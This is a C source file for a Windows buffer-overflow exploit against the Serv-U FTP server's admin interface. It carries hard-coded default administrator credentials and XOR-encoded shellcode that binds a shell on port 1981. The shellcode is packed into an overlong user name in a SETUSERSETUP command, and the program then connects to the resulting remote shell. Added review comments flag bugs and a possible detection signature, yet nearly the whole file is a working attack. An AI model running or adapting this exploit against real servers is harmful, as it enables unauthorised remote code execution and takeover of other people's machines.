-=-=-=-=-=-=-=-=-= start su_local_ecp.c -=-=-=-=-=-=-=-=-=
/*
|"USER="|sc|nop|long_jmp_back(5 bytes)|eip|short_jmp_back(2 bytes)|
|<------ 0x160+4 bytes ------------->|
*/
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#define offset (0x160-5-1)
#define short_jmp_back_9 "\xeb\xf5"
#define long_jmp_back_15B "\xE9\xA1\xFE\xFF\xFF"
#define jmpesp "\x12\x45\xfa\x7f"
//#define jmpesp "\x77\xe4\x2c\x75"//77e42c75
void shell (int sock);
#pragma comment(lib,"ws2_32")
/* Command strings sent by main(), in order: user, pass, SITE MAINTENANCE,
 * -SETDOMAIN, and szCreateUser.  Declared unsigned char* but assigned plain
 * string literals (char) in main(), which a C compiler may warn about. */
unsigned char *szSend[5];
/* User-name field assembled by main(): payload + 'A' padding up to `offset`
 * (346) + the 5 + 4 + 2 fixed bytes from the #defines = at most 357 bytes,
 * so 512 is sufficient. */
unsigned char szEvilUserName[512];
/* The -SETUSERSETUP command text that embeds szEvilUserName (sprintf() in main()). */
unsigned char szCreateUser[0x1000];
//shellcode ripped from :)
/* Encoded payload kept as a C string literal: it contains no 0x00 byte, which
 * is what lets main() use strcpy()/strlen() on it.  The fixed byte sequences at
 * its start and end (see "decode end sign" below) are constant across uses and
 * could serve as a detection signature for this sample. */
unsigned char sc_bind_port_1981[]=
// Starting from esp, search toward lower memory for the section that needs
// decoding; ":)" is both the start marker and the end marker.
"\x8B\xDC"
"\xBE\x44\x59\x41\x53\x46\xBF\x44\x59\x34\x53\x47"
//"\x43"//inc ebx
"\x4B"//dec ebx
"\x39\x33\x75"
"\xFB\x83\xC3\x04\x80\x33\x96\x43\x39\x3B\x75\xF8\x45\x59\x41\x53"
//sc_bind_1981 for 2k/xp/2003 v1.03.10.09 by :)<:) at xfocus.org>
//XOR with 0x96 (267 0x10B bytes)
"\x7E\xB2\x96\x96\x96\x22\xEB\x83\x0E\x5D\xD4\xE1\x2E\x4A\x4B\x8C"
"\xA5\x7F\x2D\x55\x38\x50\xBD\x2B\xB8\x48\xC1\xE4\x32\xB2\x24\xA4"
"\x96\x98\xCB\x5D\x48\xE2\xB4\xF5\x5E\xC9\xFC\xA6\xCD\xF2\x1D\x95"
"\x1D\xD6\x9A\x1D\xE6\x8A\x3B\x1D\xFE\x9E\xFC\x92\xCF\x7E\x12\x96"
"\x96\x96\x74\x6F\x23\x95\xBD\x77\xFE\xA5\xA4\x96\x96\xFE\xE1\xE5"
"\xA4\xC9\xC2\x69\xC1\x6E\x03\xFC\x93\xCF\x7E\xF1\x96\x96\x96\x74"
"\x6F\x1D\x61\xC7\xFE\x94\x96\x91\x2B\x1D\x7A\xC7\xC7\xC7\xC7\xFC"
"\x97\xFC\x94\x69\xC0\x66\x05\xFC\x86\xC3\xC5\x69\xC0\x62\xC6\xC5"
"\x69\xC0\x6E\x1D\x6A\xFC\x98\xCF\x3D\x74\x6B\xC6\xC6\xC5\x69\xC0"
"\x6A\x3D\x3D\x3D\xF0\x51\xD2\xB2\xBA\x97\x97\x1D\x42\xFE\xF5\xFB"
"\xF2\x96\x1D\x5A\xC5\xC6\xC1\xC4\xA5\x4D\xC5\xC5\xC5\xFC\x97\xC5"
"\xC5\xC7\xC5\x69\xC0\x76\xFC\x69\x69\xA1\x69\xC0\x4A\x69\xC0\x7A"
"\x69\xC0\x7A\x69\xC0\x7E\xC7\x1D\xE3\xAA\x1D\xE2\xB8\xEE\x95\x63"
"\xC0\x1D\xE0\xB6\x95\x63\xA5\x5F\xDF\xD7\x3B\x95\x53\xA5\x4D\xA5"
"\x44\x99\x28\x86\xAC\x40\xE2\x9E\x57\x5D\x8D\x95\x4C\xD6\x7D\x79"
"\xAD\x89\xE3\x73\xC8\x1D\xC8\xB2\x95\x4B\xF0\x1D\x9A\xDD\x1D\xC8"
"\x8A\x95\x4B\x1D\x92\x1D\x95\x53\x3D\xCF\x55"
//decode end sign
"\x45\x59\x34\x53";
/* Print the command-line synopsis to stdout; p is the program name (argv[0]). */
void usage(char *p)
{
    const char *prog = p;
    fprintf(stdout, "Usage: %s <-i ip> [-P port] [-u user] [-p pass]\n", prog);
}
/*
 * Program entry point (non-standard `void main`; all exits are plain `return`).
 * Parses -i/-P/-u/-p, fills szSend[] and szEvilUserName/szCreateUser, opens a
 * TCP connection to ip:iPort, sends the five szSend[] strings (reading one
 * reply before each), then after a 2-second pause connects to port 1981 on
 * the same host and hands that socket to shell().
 */
void main(int argc, char **argv)
{
struct sockaddr_in sa,server;
WSADATA wsd;
/* NOTE(review): s and s2 are never initialised.  The __finally block below
 * compares s with INVALID_SOCKET, so when WSAStartup() fails (the only __leave
 * that happens before socket() is called) it reads an indeterminate value.
 * Initialising both to INVALID_SOCKET would fix that; s2 is also never closed. */
SOCKET s,s2;
int iErr;
char szRecvBuff[0x1000];
int i,ret;
int iPort=43958;/* default port; -P overrides it */
char *ip=NULL, *user = NULL, *pass = NULL, u[128], p[128];
printf( "Serv-U Admin interface create user with long name BOF exp v1\n"
"This version can exploit serv-u v5.0.0.4(maybe others)\n\n");
if(argc < 2)
{
usage(argv[0]);
return;
}
/* Options are "-x value" pairs, hence the step of two. */
for(i=1;i<argc;i+=2)
{
/* Every option token must be exactly two characters ("-x"). */
if(strlen(argv[i]) != 2)
{
usage(argv[0]);
return;
}
// an option with no value after it
if(i == argc-1)
{
usage(argv[0]);
return;
}
/* No default case: unknown option letters are silently ignored. */
switch(argv[i][1])
{
case 'i':
ip=argv[i+1];
break;
case 'P':
iPort=atoi(argv[i+1]);/* no range check; atoi() yields 0 for non-numeric text */
break;
case 'u':
/* NOTE(review): MSVC _snprintf does not NUL-terminate on truncation, so a
 * name long enough to fill u (or p below) leaves the buffer unterminated and
 * the later strlen(szSend[i]) in the send loop reads past it. */
_snprintf(u, sizeof(u), "USER %s\r\n", argv[i+1]);
user=u;
break;
case 'p':
_snprintf(p, sizeof(p), "PASS %s\r\n", argv[i+1]);
pass=p;
break;
}
}
if(!ip)
{
printf("[-] Invalid parameter.\n");
return;
}
/* Credentials: -u and -p must both be given, otherwise the built-in pair is used. */
if(user && pass)
{
szSend[0] = user;
szSend[1] = pass;
}
else
{
szSend[0] = "USER LocalAdministrator\r\n";//user
szSend[1] = "PASS #l@$ak#.lk;0@P\r\n";//pass
}
szSend[2] = "SITE MAINTENANCE\r\n";
szSend[3] = "-SETDOMAIN\r\n"
"-Domain=wahaha|0.0.0.0|21218|-1|1|0\r\n"
"-DynDNSEnable=0\r\n"
" DynIPName=\r\n";
szSend[4] = szCreateUser;/* filled in by the sprintf() below */
/* Build the oversized user name: payload, 'A' padding up to `offset`, then the
 * three fixed byte strings from the #defines (5 + 4 + 2 bytes).  strcpy() is
 * only valid here because sc_bind_port_1981 contains no 0x00 byte. */
strcpy(szEvilUserName, sc_bind_port_1981);
i = strlen(szEvilUserName);
if(i > offset)
{
printf("[-] shellcode too long.\n");
return;
}
printf("[+] sc len = 0x%X %d bytes.\n", i, i);
printf("[+] pan len = 0x%X %d bytes.\n", offset-i, offset-i);
for(;i<offset;i++)
strcat(szEvilUserName, "A");/* one strcat() per byte: quadratic, but bounded by offset */
strcat(szEvilUserName, long_jmp_back_15B);
strcat(szEvilUserName, jmpesp);
strcat(szEvilUserName, short_jmp_back_9);
/* Total is at most offset + 11 bytes (357), well inside both 512 and 0x1000. */
sprintf(szCreateUser, "-SETUSERSETUP\r\n"
"-IP=0.0.0.0\r\n"
"-PortNo=21218\r\n"
" User=%s\r\n", szEvilUserName);
/* MSVC structured exception handling: __leave jumps straight to __finally. */
__try
{
if (WSAStartup(MAKEWORD(1,1), &wsd) != 0)
{
printf("[-] WSAStartup error:%d\n", WSAGetLastError());
__leave;
}
s=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(s == INVALID_SOCKET)
{
printf("[-] Create socket failed:%d\n",GetLastError());
__leave;
}
sa.sin_family=AF_INET;
sa.sin_port=htons(iPort);
sa.sin_addr.S_un.S_addr=inet_addr(ip);/* NOTE(review): INADDR_NONE (unparsable address) is not checked */
iErr = connect(s,(struct sockaddr *)&sa,sizeof(sa));
if(iErr == SOCKET_ERROR)
{
/* NOTE(review): three conversions but only two arguments -- the trailing %d
 * has no matching WSAGetLastError() argument, which is undefined behaviour. */
printf("[-] connect to %s:%d error:%d\n", ip, iPort);
__leave;
}
/* Request/response loop: read one reply, then send the next szSend[] entry. */
for(i=0;i<sizeof(szSend)/sizeof(szSend[0]);i++)
{
memset(szRecvBuff, 0, sizeof(szRecvBuff));
/* NOTE(review): recv() may fill all 0x1000 bytes, leaving no terminator for
 * the %s below; a return of 0 (peer closed) is also not treated as an error. */
iErr = recv(s, szRecvBuff, sizeof(szRecvBuff), 0);
if(iErr == SOCKET_ERROR)
{
printf("[-] recv buffer error:%d.\n", WSAGetLastError());
__leave;
}
printf("[+] Recv:\n%s", szRecvBuff);
iErr = send(s, szSend[i], strlen(szSend[i]),0);
if(iErr == SOCKET_ERROR)
{
printf("[-] send buffer error:%d.\n", WSAGetLastError());
__leave;
}
/* The last entry is the long -SETUSERSETUP block; print only its length. */
if(i==sizeof(szSend)/sizeof(szSend[0])-1)
printf("[+] Send evil buff 0x%X %d bytes.\n", iErr, iErr);
else
printf("[+] Send:\n%s", szSend[i]);
}
printf("[+] Wait from shell.\n");
Sleep(2000);
/* Second connection, to port 1981 on the same host.  NOTE(review): s2 is not
 * checked against INVALID_SOCKET and is never closed (shell() does not close it). */
s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
server.sin_family = AF_INET;
server.sin_port = htons(1981);
server.sin_addr.s_addr=inet_addr(ip);
ret = connect(s2, (struct sockaddr *)&server, sizeof(server));
if(ret!=0)
{
printf("[-] Exploit seem failed.\n");
__leave;
}
printf("[+] Exploit success! Have fun! :)\n");
shell(s2);
}
__finally
{
/* Runs on every exit from the __try block, including each __leave. */
if(s != INVALID_SOCKET) closesocket(s);
WSACleanup();
}
return;
}
/*
ripped from TESO code and
modifed by :) <:)@xfocus.org> for win32
*/
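/*
 * Relay between the connected stream socket `sock` and this process's
 * stdin (fd 0) / stdout (fd 1) until either side closes.  Each round waits
 * up to one second for the socket to become readable: socket data is copied
 * to fd 1, otherwise a blocking read on fd 0 is forwarded to the socket.
 *
 * sock: a connected stream socket.  Returns when recv/send/read/write
 * reports EOF or an error, or when select() itself fails.  The socket is
 * not closed here; the caller owns it.
 */
void shell (int sock)
{
    char buf[512];

    while (1)
    {
        /* Rebuild the descriptor set and the timeout every round: POSIX
         * select() may modify both, and the hand-built {count, handle} pair
         * the original used only matched the Winsock fd_set layout on 32-bit
         * builds.  (On POSIX, sock must be < FD_SETSIZE for FD_SET to be valid.) */
        fd_set rfds;
        struct timeval tv;
        int n;

        FD_ZERO(&rfds);
        FD_SET(sock, &rfds);
        tv.tv_sec = 1;
        tv.tv_usec = 0;

        /* Winsock ignores the first argument; sock + 1 is what POSIX requires. */
        n = select(sock + 1, &rfds, NULL, NULL, &tv);
        if (n < 0)
        {
            /* Previously a select() failure fell through to the stdin branch. */
            printf("[-] select error.\n");
            return;
        }

        if (n == 1)
        {
            /* Socket readable: copy what arrived to stdout. */
            n = recv(sock, buf, sizeof (buf), 0);
            if (n <= 0)
            {
                printf ("[-] Connection closed.\n");
                return;
            }
            n = write(1, buf, n);
            if (n <= 0)
            {
                printf ("[-] Connection closed.\n");
                return;
            }
        }
        else
        {
            /* Timed out: forward local input (read() blocks until there is some). */
            n = read(0, buf, sizeof (buf));
            if (n <= 0)
            {
                printf("[-] Connection closed.\n");
                return;
            }
            n = send(sock, buf, n, 0);
            if (n <= 0)
            {
                printf("[-] Connection closed.\n");
                return;
            }
        }
    }
}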
-=-=-=-=-=-=-=-=-= end su_local_ecp.c -=-=-=-=-=-=-=-=-=